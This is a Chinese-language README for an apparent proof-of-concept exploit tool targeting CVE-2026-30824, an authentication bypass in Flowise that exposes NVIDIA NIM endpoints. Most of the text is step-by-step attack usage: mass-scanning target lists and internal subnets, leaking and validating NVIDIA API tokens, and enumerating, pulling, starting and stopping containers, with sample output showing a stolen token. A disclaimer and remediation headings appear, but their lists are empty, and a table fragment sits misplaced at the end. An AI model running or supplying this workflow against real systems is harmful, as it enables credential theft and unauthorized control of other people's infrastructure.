一个针对 CVE-2026-30824 的概念验证检测器与利用工具,该漏洞是 Flowise 中的一个严重认证绕过漏洞,可在无需认证的情况下暴露 NVIDIA NIM API 端点。
CVE-2026-30824 是 Flowise(< 3.0.13)中的一个严重认证绕过漏洞,允许未认证的远程攻击者访问 NVIDIA NIM 容器管理和 API 令牌生成端点。
| 字段 | 值 |
|---|---|
| CVSS 评分 | 9.8(严重) |
| CWE | CWE-306:关键功能缺少认证 |
| 受影响版本 | Flowise < 3.0.13 |
| 影响 | 完全容器管理、GPU 访问、令牌窃取 |
/api/v1/nvidia-nim/* 路径在全局认证中间件中被列入白名单,允许未认证访问:
✅ 漏洞检测 — 快速检查目标是否存在漏洞
✅ 令牌提取 — 从易受攻击的端点泄露 NVIDIA API 令牌
✅ 令牌验证 — 针对 NVIDIA API 验证令牌(展示影响范围)
✅ 容器枚举 — 列出正在运行的 NIM 容器
✅ 批量扫描 — 从文件扫描多个目标
✅ SSL 绕过 — 默认忽略自签名证书
✅ 彩色输出 — 易于阅读的状态指示器(绿色/黄色/红色)
✅ 侦察 — 完整端点映射与诊断
requests 库# 克隆或下载脚本
git clone <repository>
cd cve-2026-30824
# 安装依赖
pip install -r requirements.txt
# 或
pip install requests
# 检查单个目标是否存在漏洞
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --check
# 预期输出(存在漏洞):
# [+] 目标疑似存在漏洞(HTTP 200)
# 响应:{...}
# 创建 targets.txt,每行一个 URL
cat > targets.txt << EOF
http://192.168.1.100:3000
http://192.168.1.101:3000
http://192.168.1.102:3000
EOF
# 扫描所有目标(快速模式,无提示)
python3 CVE-2026-30824.py -f targets.txt --scan-only
# 预期摘要输出:
# ============================================================
# [*] 扫描摘要
# ============================================================
# [+] 存在漏洞:2
# ✓ http://192.168.1.100:3000
# ✓ http://192.168.1.101:3000
# [-] 已修补:1
# ✗ http://192.168.1.102:3000
# 从易受攻击的端点泄露 NVIDIA API 令牌
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --get-token
# 预期输出:
# [*] 正在尝试泄露 NVIDIA API 令牌...
# [+] NVIDIA API 令牌:eyJ0eXAiOiJKV1QiLCJhbGc...
# [+] 令牌类型:Bearer
# [+] 过期时间:3600 秒
# 验证泄露的令牌是否可用于真实的 NVIDIA API
python3 CVE-2026-30824.py --validate-token "eyJ0eXAiOiJKV1QiLCJhbGc..."
# 预期输出:
# [*] 正在针对 NVIDIA API 验证令牌...
# [+] 令牌有效!可访问 45 个 NVIDIA NIM 模型。
# - mistralai/mistral-7b-instruct-v0.1
# - meta-llama/llama2-70b
# - (...)
# 枚举目标上的容器
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --list-containers
# 预期输出:
# [*] 正在列出正在运行的容器...
# [+] HTTP 200
# [
# {
# "id": "abc123xyz",
# "names": ["flowise_nim"],
# "image": "nvcr.io/nvidia/nim:latest",
# "state": "running"
# }
# ]
# 对易受攻击的目标运行所有侦察检查
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --all
usage: CVE-2026-30824.py [-h] [-t TARGET] [-f TARGETS_FILE] [--check]
[--scan-only] [--get-token]
[--validate-token TOKEN] [--list-containers]
[--get-container CONTAINER_ID]
[--get-image IMAGE_ID] [--pull-image IMAGE_TAG]
[--start-container IMAGE_TAG]
[--container-name CONTAINER_NAME]
[--stop-container CONTAINER_ID] [--preload]
[--all] [--timeout TIMEOUT] [--debug]
可选参数:
-h, --help 显示此帮助信息并退出
-t, --target TARGET 目标 URL(例如:http://192.168.1.100:3000)
-f, --targets-file FILE 包含目标列表的文件(每行一个)
漏洞检测:
--check 仅检查目标是否存在漏洞
--scan-only 扫描目标是否存在漏洞,无提示
--debug 显示请求详情和原始响应
利用:
--get-token 泄露 NVIDIA API 令牌
--validate-token TOKEN 针对 NVIDIA API 验证泄露的令牌
--list-containers 列出正在运行的 NIM 容器
--get-container CONTAINER_ID 获取容器详情
--get-image IMAGE_ID 获取镜像详情
--pull-image IMAGE_TAG 拉取 Docker 镜像(例如:nvcr.io/nvidia/nim:latest)
--start-container IMAGE_TAG 从镜像标签启动容器
--container-name NAME 启动的容器名称
--stop-container CONTAINER_ID 停止正在运行的容器
--preload 触发资源预加载端点
--all 运行所有侦察检查
高级:
--timeout SECONDS 请求超时时间(秒)(默认:15)
# 1. 扫描整个子网以查找易受攻击的实例
python3 CVE-2026-30824.py -f internal_ips.txt --scan-only
# 2. 对每个易受攻击的目标提取令牌
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --get-token
# 3. 验证令牌影响
python3 CVE-2026-30824.py --validate-token "<extracted-token>"
# 验证漏洞并展示完整影响范围
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --all
# 这将:
# 1. 检查漏洞
# 2. 提取 NVIDIA API 令牌
# 3. 针对 NVIDIA API 验证令牌
# 4. 列出正在运行的容器
# 5. 显示资源枚举
# 定期监控目标(通过 cron 或调度器)
python3 CVE-2026-30824.py -f monitored_targets.txt --scan-only > scan_$(date +%s).log
| HTTP | 含义 |
|---|---|
| 200 | ✅ 存在漏洞(端点可访问) |
| 400 | ✅ 存在漏洞(应用程序错误但端点存在) |
| 401 | 🟡 已修补(需要认证) |
| 404 | 🟡 非 Flowise 或端点不存在 |
问题: 端点返回 HTML 页面而非 JSON API 响应。
解决方案:
问题: 无法访问目标。
解决方案:
# 测试连接
curl -v http://192.168.1.100:3000/
# 增加超时时间
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --check --timeout 30
问题: 目标使用自签名或过期证书。
解决方案: 脚本默认禁用 SSL 验证。如果问题仍然存在:
# 显式添加端口和协议
python3 CVE-2026-30824.py -t https://192.168.1.100:3000 --check
问题: 令牌已提取但针对 NVIDIA API 的验证失败。
原因:
⚠️ 法律声明
如果您在真实环境中发现此漏洞:
立即执行:
长期措施:
/api/v1/nvidia-nim/* 路径此工具仅用于教育和授权安全测试目的。详情请参阅 LICENSE 文件。
此利用工具按“原样”提供,不附带任何担保。仅可在您拥有或获得明确书面许可的系统上使用。作者不对因使用此工具造成的任何滥用或损害负责。
为授权渗透测试和安全研究而创建。
最后更新: 2026 年 4 月
| 5xx |
| 🔴 服务器错误/配置错误 |